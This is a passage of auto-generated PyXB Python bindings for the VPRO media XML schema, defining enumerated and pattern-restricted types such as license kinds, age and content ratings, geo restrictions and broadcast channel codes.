roleType.STAGING = roleType._CF_enumeration.addEnumeration(unicode_value='STAGING', tag='STAGING')
roleType.STUNT = roleType._CF_enumeration.addEnumeration(unicode_value='STUNT', tag='STUNT')
roleType.VISUAL_EFFECTS = roleType._CF_enumeration.addEnumeration(unicode_value='VISUAL_EFFECTS', tag='VISUAL_EFFECTS')
roleType.UNDEFINED = roleType._CF_enumeration.addEnumeration(unicode_value='UNDEFINED', tag='UNDEFINED')
roleType._InitializeFacetMap(roleType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'roleType', roleType)
_module_typeBindings.roleType = roleType
# Atomic simple type: {urn:vpro:media:2009}geoRoleType
class geoRoleType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRoleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 614, 2)
_Documentation = None
geoRoleType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=geoRoleType, enum_prefix=None)
geoRoleType.RECORDED_IN = geoRoleType._CF_enumeration.addEnumeration(unicode_value='RECORDED_IN', tag='RECORDED_IN')
geoRoleType.SUBJECT = geoRoleType._CF_enumeration.addEnumeration(unicode_value='SUBJECT', tag='SUBJECT')
geoRoleType.PRODUCED_IN = geoRoleType._CF_enumeration.addEnumeration(unicode_value='PRODUCED_IN', tag='PRODUCED_IN')
geoRoleType.UNDEFINED = geoRoleType._CF_enumeration.addEnumeration(unicode_value='UNDEFINED', tag='UNDEFINED')
geoRoleType._InitializeFacetMap(geoRoleType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'geoRoleType', geoRoleType)
_module_typeBindings.geoRoleType = geoRoleType
# Atomic simple type: {urn:vpro:media:2009}license
class license (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'license')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 661, 2)
_Documentation = None
license._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=license, enum_prefix=None)
license.COPYRIGHTED = license._CF_enumeration.addEnumeration(unicode_value='COPYRIGHTED', tag='COPYRIGHTED')
license.PUBLIC_DOMAIN = license._CF_enumeration.addEnumeration(unicode_value='PUBLIC_DOMAIN', tag='PUBLIC_DOMAIN')
license.CC_BY = license._CF_enumeration.addEnumeration(unicode_value='CC_BY', tag='CC_BY')
license.CC_BY_SA = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_SA', tag='CC_BY_SA')
license.CC_BY_ND = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_ND', tag='CC_BY_ND')
license.CC_BY_NC = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC', tag='CC_BY_NC')
license.CC_BY_NC_SA = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC_SA', tag='CC_BY_NC_SA')
license.CC_BY_NC_ND = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC_ND', tag='CC_BY_NC_ND')
license._InitializeFacetMap(license._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'license', license)
_module_typeBindings.license = license
# Atomic simple type: {urn:vpro:media:2009}websiteType
class websiteType (pyxb.binding.datatypes.anyURI):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'websiteType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 680, 2)
_Documentation = None
websiteType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
websiteType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
websiteType._InitializeFacetMap(websiteType._CF_minLength,
websiteType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'websiteType', websiteType)
_module_typeBindings.websiteType = websiteType
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 693, 10)
_Documentation = None
STD_ANON._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON, enum_prefix=None)
STD_ANON.ACCOUNT = STD_ANON._CF_enumeration.addEnumeration(unicode_value='ACCOUNT', tag='ACCOUNT')
STD_ANON.HASHTAG = STD_ANON._CF_enumeration.addEnumeration(unicode_value='HASHTAG', tag='HASHTAG')
STD_ANON._InitializeFacetMap(STD_ANON._CF_enumeration)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: {urn:vpro:media:2009}scheduleEventTypeEnum
class scheduleEventTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 774, 2)
_Documentation = None
scheduleEventTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=scheduleEventTypeEnum, enum_prefix=None)
scheduleEventTypeEnum.STRAND = scheduleEventTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
scheduleEventTypeEnum._InitializeFacetMap(scheduleEventTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'scheduleEventTypeEnum', scheduleEventTypeEnum)
_module_typeBindings.scheduleEventTypeEnum = scheduleEventTypeEnum
# Atomic simple type: {urn:vpro:media:2009}predictionStateEnum
class predictionStateEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'predictionStateEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 780, 2)
_Documentation = None
predictionStateEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=predictionStateEnum, enum_prefix=None)
predictionStateEnum.NOT_ANNOUNCED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='NOT_ANNOUNCED', tag='NOT_ANNOUNCED')
predictionStateEnum.ANNOUNCED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='ANNOUNCED', tag='ANNOUNCED')
predictionStateEnum.REALIZED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='REALIZED', tag='REALIZED')
predictionStateEnum.REVOKED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='REVOKED', tag='REVOKED')
predictionStateEnum._InitializeFacetMap(predictionStateEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'predictionStateEnum', predictionStateEnum)
_module_typeBindings.predictionStateEnum = predictionStateEnum
# Atomic simple type: {urn:vpro:media:2009}locationTypeEnum
class locationTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 823, 2)
_Documentation = None
locationTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=locationTypeEnum, enum_prefix=None)
locationTypeEnum.INTERNAL = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='INTERNAL', tag='INTERNAL')
locationTypeEnum.EXTERNAL = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='EXTERNAL', tag='EXTERNAL')
locationTypeEnum.UNKNOWN = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='UNKNOWN', tag='UNKNOWN')
locationTypeEnum._InitializeFacetMap(locationTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'locationTypeEnum', locationTypeEnum)
_module_typeBindings.locationTypeEnum = locationTypeEnum
# Atomic simple type: {urn:vpro:media:2009}midType
class midType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'midType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 909, 2)
_Documentation = None
midType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(4))
midType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
midType._CF_pattern = pyxb.binding.facets.CF_pattern()
midType._CF_pattern.addPattern(pattern='[ \\.a-zA-Z0-9_-]+')
midType._InitializeFacetMap(midType._CF_minLength,
midType._CF_maxLength,
midType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'midType', midType)
_module_typeBindings.midType = midType
# Atomic simple type: {urn:vpro:media:2009}organizationIdType
class organizationIdType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'organizationIdType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 917, 2)
_Documentation = None
organizationIdType._CF_pattern = pyxb.binding.facets.CF_pattern()
organizationIdType._CF_pattern.addPattern(pattern='[A-Z0-9_-]{2,}')
organizationIdType._InitializeFacetMap(organizationIdType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'organizationIdType', organizationIdType)
_module_typeBindings.organizationIdType = organizationIdType
# Atomic simple type: {urn:vpro:media:2009}relationTypeType
class relationTypeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'relationTypeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 923, 2)
_Documentation = None
relationTypeType._CF_pattern = pyxb.binding.facets.CF_pattern()
relationTypeType._CF_pattern.addPattern(pattern='[A-Z0-9_-]{4,}')
relationTypeType._InitializeFacetMap(relationTypeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'relationTypeType', relationTypeType)
_module_typeBindings.relationTypeType = relationTypeType
# Atomic simple type: {urn:vpro:media:2009}baseTextType
class baseTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'baseTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 929, 2)
_Documentation = None
baseTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
baseTextType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
baseTextType._InitializeFacetMap(baseTextType._CF_minLength,
baseTextType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'baseTextType', baseTextType)
_module_typeBindings.baseTextType = baseTextType
# Atomic simple type: {urn:vpro:media:2009}unrequiredBaseTextType
class unrequiredBaseTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'unrequiredBaseTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 936, 2)
_Documentation = None
unrequiredBaseTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(0))
unrequiredBaseTextType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
unrequiredBaseTextType._InitializeFacetMap(unrequiredBaseTextType._CF_minLength,
unrequiredBaseTextType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'unrequiredBaseTextType', unrequiredBaseTextType)
_module_typeBindings.unrequiredBaseTextType = unrequiredBaseTextType
# Atomic simple type: {urn:vpro:media:2009}unboundedTextType
class unboundedTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'unboundedTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 943, 2)
_Documentation = None
unboundedTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
unboundedTextType._InitializeFacetMap(unboundedTextType._CF_minLength)
Namespace.addCategoryObject('typeBinding', 'unboundedTextType', unboundedTextType)
_module_typeBindings.unboundedTextType = unboundedTextType
# Atomic simple type: {urn:vpro:media:2009}termType
class termType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'termType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 956, 2)
_Documentation = None
termType._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'termType', termType)
_module_typeBindings.termType = termType
# Atomic simple type: {urn:vpro:media:2009}genreIdType
class genreIdType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'genreIdType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 960, 2)
_Documentation = None
genreIdType._CF_pattern = pyxb.binding.facets.CF_pattern()
genreIdType._CF_pattern.addPattern(pattern='3(\\.[0-9]+)+')
genreIdType._InitializeFacetMap(genreIdType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'genreIdType', genreIdType)
_module_typeBindings.genreIdType = genreIdType
# Atomic simple type: {urn:vpro:media:2009}geoRestrictionEnum
class geoRestrictionEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRestrictionEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1020, 2)
_Documentation = None
geoRestrictionEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=geoRestrictionEnum, enum_prefix=None)
geoRestrictionEnum.NL = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NL', tag='NL')
geoRestrictionEnum.BENELUX = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='BENELUX', tag='BENELUX')
geoRestrictionEnum.NLBES = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NLBES', tag='NLBES')
geoRestrictionEnum.NLALL = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NLALL', tag='NLALL')
geoRestrictionEnum.EU = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='EU', tag='EU')
geoRestrictionEnum.EUROPE = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='EUROPE', tag='EUROPE')
geoRestrictionEnum._InitializeFacetMap(geoRestrictionEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'geoRestrictionEnum', geoRestrictionEnum)
_module_typeBindings.geoRestrictionEnum = geoRestrictionEnum
# Atomic simple type: {urn:vpro:media:2009}gtaaStatusType
class gtaaStatusType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'gtaaStatusType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1067, 2)
_Documentation = None
gtaaStatusType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=gtaaStatusType, enum_prefix=None)
gtaaStatusType.candidate = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='candidate', tag='candidate')
gtaaStatusType.approved = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='approved', tag='approved')
gtaaStatusType.redirected = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='redirected', tag='redirected')
gtaaStatusType.not_compliant = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='not_compliant', tag='not_compliant')
gtaaStatusType.rejected = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='rejected', tag='rejected')
gtaaStatusType.obsolete = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='obsolete', tag='obsolete')
gtaaStatusType.deleted = gtaaStatusType._CF_enumeration.addEnumeration(unicode_value='deleted', tag='deleted')
gtaaStatusType._InitializeFacetMap(gtaaStatusType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'gtaaStatusType', gtaaStatusType)
_module_typeBindings.gtaaStatusType = gtaaStatusType
# Atomic simple type: {urn:vpro:media:2009}contentRatingType
class contentRatingType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'contentRatingType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1080, 2)
_Documentation = None
contentRatingType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=contentRatingType, enum_prefix=None)
contentRatingType.DISCRIMINATIE = contentRatingType._CF_enumeration.addEnumeration(unicode_value='DISCRIMINATIE', tag='DISCRIMINATIE')
contentRatingType.GROF_TAALGEBRUIK = contentRatingType._CF_enumeration.addEnumeration(unicode_value='GROF_TAALGEBRUIK', tag='GROF_TAALGEBRUIK')
contentRatingType.ANGST = contentRatingType._CF_enumeration.addEnumeration(unicode_value='ANGST', tag='ANGST')
contentRatingType.GEWELD = contentRatingType._CF_enumeration.addEnumeration(unicode_value='GEWELD', tag='GEWELD')
contentRatingType.SEKS = contentRatingType._CF_enumeration.addEnumeration(unicode_value='SEKS', tag='SEKS')
contentRatingType.DRUGS_EN_ALCOHOL = contentRatingType._CF_enumeration.addEnumeration(unicode_value='DRUGS_EN_ALCOHOL', tag='DRUGS_EN_ALCOHOL')
contentRatingType._InitializeFacetMap(contentRatingType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'contentRatingType', contentRatingType)
_module_typeBindings.contentRatingType = contentRatingType
# Atomic simple type: {urn:vpro:media:2009}ageRatingType
class ageRatingType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ageRatingType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1127, 2)
_Documentation = None
ageRatingType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=ageRatingType, enum_prefix=None)
ageRatingType.n6 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='6', tag='n6')
ageRatingType.n9 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='9', tag='n9')
ageRatingType.n12 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='12', tag='n12')
ageRatingType.n14 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='14', tag='n14')
ageRatingType.n16 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='16', tag='n16')
ageRatingType.n18 = ageRatingType._CF_enumeration.addEnumeration(unicode_value='18', tag='n18')
ageRatingType.ALL = ageRatingType._CF_enumeration.addEnumeration(unicode_value='ALL', tag='ALL')
ageRatingType.NOT_YET_RATED = ageRatingType._CF_enumeration.addEnumeration(unicode_value='NOT_YET_RATED', tag='NOT_YET_RATED')
ageRatingType._InitializeFacetMap(ageRatingType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'ageRatingType', ageRatingType)
_module_typeBindings.ageRatingType = ageRatingType
# Atomic simple type: {urn:vpro:media:2009}countryCodeType
class countryCodeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'countryCodeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1196, 2)
_Documentation = None
countryCodeType._CF_pattern = pyxb.binding.facets.CF_pattern()
countryCodeType._CF_pattern.addPattern(pattern='(\\w){2,4}')
countryCodeType._InitializeFacetMap(countryCodeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'countryCodeType', countryCodeType)
_module_typeBindings.countryCodeType = countryCodeType
# Atomic simple type: {urn:vpro:media:2009}languageCodeType
class languageCodeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'languageCodeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1216, 2)
_Documentation = None
languageCodeType._CF_pattern = pyxb.binding.facets.CF_pattern()
languageCodeType._CF_pattern.addPattern(pattern='(\\w){2,4}')
languageCodeType._InitializeFacetMap(languageCodeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'languageCodeType', languageCodeType)
_module_typeBindings.languageCodeType = languageCodeType
# Atomic simple type: {urn:vpro:media:2009}channelEnum
class channelEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'channelEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1228, 2)
_Documentation = None
channelEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=channelEnum, enum_prefix=None)
channelEnum.NED1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED1', tag='NED1')
channelEnum.NED2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED2', tag='NED2')
channelEnum.NED3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NED3', tag='NED3')
channelEnum.NEDE = channelEnum._CF_enumeration.addEnumeration(unicode_value='NEDE', tag='NEDE')
channelEnum.RTL4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL4', tag='RTL4')
channelEnum.RTL5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL5', tag='RTL5')
channelEnum.SBS6 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SBS6', tag='SBS6')
channelEnum.RTL7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL7', tag='RTL7')
channelEnum.VERO = channelEnum._CF_enumeration.addEnumeration(unicode_value='VERO', tag='VERO')
channelEnum.NET5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NET5', tag='NET5')
channelEnum.RTL8 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL8', tag='RTL8')
channelEnum.REGI = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGI', tag='REGI')
channelEnum.OFRY = channelEnum._CF_enumeration.addEnumeration(unicode_value='OFRY', tag='OFRY')
channelEnum.NOOR = channelEnum._CF_enumeration.addEnumeration(unicode_value='NOOR', tag='NOOR')
channelEnum.RTVD = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTVD', tag='RTVD')
channelEnum.OOST = channelEnum._CF_enumeration.addEnumeration(unicode_value='OOST', tag='OOST')
channelEnum.GELD = channelEnum._CF_enumeration.addEnumeration(unicode_value='GELD', tag='GELD')
channelEnum.FLEV = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLEV', tag='FLEV')
channelEnum.BRAB = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRAB', tag='BRAB')
channelEnum.REGU = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGU', tag='REGU')
channelEnum.NORH = channelEnum._CF_enumeration.addEnumeration(unicode_value='NORH', tag='NORH')
channelEnum.WEST = channelEnum._CF_enumeration.addEnumeration(unicode_value='WEST', tag='WEST')
channelEnum.RIJN = channelEnum._CF_enumeration.addEnumeration(unicode_value='RIJN', tag='RIJN')
channelEnum.L1TV = channelEnum._CF_enumeration.addEnumeration(unicode_value='L1TV', tag='L1TV')
channelEnum.OZEE = channelEnum._CF_enumeration.addEnumeration(unicode_value='OZEE', tag='OZEE')
channelEnum.AT5 = channelEnum._CF_enumeration.addEnumeration(unicode_value='AT5_', tag='AT5')
channelEnum.RNN7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNN7', tag='RNN7')
channelEnum.BVNT = channelEnum._CF_enumeration.addEnumeration(unicode_value='BVNT', tag='BVNT')
channelEnum.EEN = channelEnum._CF_enumeration.addEnumeration(unicode_value='EEN_', tag='EEN')
channelEnum.KETN = channelEnum._CF_enumeration.addEnumeration(unicode_value='KETN', tag='KETN')
channelEnum.VTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='VTM_', tag='VTM')
channelEnum.KA2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='KA2_', tag='KA2')
channelEnum.VT4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='VT4_', tag='VT4')
channelEnum.LUNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LUNE', tag='LUNE')
channelEnum.LDUE = channelEnum._CF_enumeration.addEnumeration(unicode_value='LDUE', tag='LDUE')
channelEnum.RTBF = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTBF', tag='RTBF')
channelEnum.ARD = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARD_', tag='ARD')
channelEnum.ZDF = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZDF_', tag='ZDF')
channelEnum.WDR = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR_', tag='WDR')
channelEnum.N_3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='N_3_', tag='N_3')
channelEnum.SUDW = channelEnum._CF_enumeration.addEnumeration(unicode_value='SUDW', tag='SUDW')
channelEnum.SWF = channelEnum._CF_enumeration.addEnumeration(unicode_value='SWF_', tag='SWF')
channelEnum.RTL = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTL_', tag='RTL')
channelEnum.SAT1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SAT1', tag='SAT1')
channelEnum.PRO7 = channelEnum._CF_enumeration.addEnumeration(unicode_value='PRO7', tag='PRO7')
channelEnum.n3SAT = channelEnum._CF_enumeration.addEnumeration(unicode_value='3SAT', tag='n3SAT')
channelEnum.KABE = channelEnum._CF_enumeration.addEnumeration(unicode_value='KABE', tag='KABE')
channelEnum.ARTE = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARTE', tag='ARTE')
channelEnum.ART = channelEnum._CF_enumeration.addEnumeration(unicode_value='ART', tag='ART')
channelEnum.T5ME = channelEnum._CF_enumeration.addEnumeration(unicode_value='T5ME', tag='T5ME')
channelEnum.FRA2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FRA2', tag='FRA2')
channelEnum.FRA3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FRA3', tag='FRA3')
channelEnum.BBC1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBC1', tag='BBC1')
channelEnum.BBC2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBC2', tag='BBC2')
channelEnum.BBTH = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBTH', tag='BBTH')
channelEnum.BBTC = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBTC', tag='BBTC')
channelEnum.BBCF = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCF', tag='BBCF')
channelEnum.BBFC = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBFC', tag='BBFC')
channelEnum.BBCP = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCP', tag='BBCP')
channelEnum.TRTI = channelEnum._CF_enumeration.addEnumeration(unicode_value='TRTI', tag='TRTI')
channelEnum.SHOW = channelEnum._CF_enumeration.addEnumeration(unicode_value='SHOW', tag='SHOW')
channelEnum.LIGT = channelEnum._CF_enumeration.addEnumeration(unicode_value='LIGT', tag='LIGT')
channelEnum.TURK = channelEnum._CF_enumeration.addEnumeration(unicode_value='TURK', tag='TURK')
channelEnum.ATVT = channelEnum._CF_enumeration.addEnumeration(unicode_value='ATVT', tag='ATVT')
channelEnum.FOXT = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXT', tag='FOXT')
channelEnum.HABN = channelEnum._CF_enumeration.addEnumeration(unicode_value='HABN', tag='HABN')
channelEnum.STTV = channelEnum._CF_enumeration.addEnumeration(unicode_value='STTV', tag='STTV')
channelEnum.RRTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='RRTM', tag='RRTM')
channelEnum.RMBC = channelEnum._CF_enumeration.addEnumeration(unicode_value='RMBC', tag='RMBC')
channelEnum.RART = channelEnum._CF_enumeration.addEnumeration(unicode_value='RART', tag='RART')
channelEnum.ARTM = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARTM', tag='ARTM')
channelEnum.TVBS = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVBS', tag='TVBS')
channelEnum.ASIA = channelEnum._CF_enumeration.addEnumeration(unicode_value='ASIA', tag='ASIA')
channelEnum.TIVI = channelEnum._CF_enumeration.addEnumeration(unicode_value='TIVI', tag='TIVI')
channelEnum.B4UM = channelEnum._CF_enumeration.addEnumeration(unicode_value='B4UM', tag='B4UM')
channelEnum.PCNE = channelEnum._CF_enumeration.addEnumeration(unicode_value='PCNE', tag='PCNE')
channelEnum.PATN = channelEnum._CF_enumeration.addEnumeration(unicode_value='PATN', tag='PATN')
channelEnum.ZEET = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZEET', tag='ZEET')
channelEnum.ZEEC = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZEEC', tag='ZEEC')
channelEnum.TVE = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVE_', tag='TVE')
channelEnum.RAI = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAI_', tag='RAI')
channelEnum.RAID = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAID', tag='RAID')
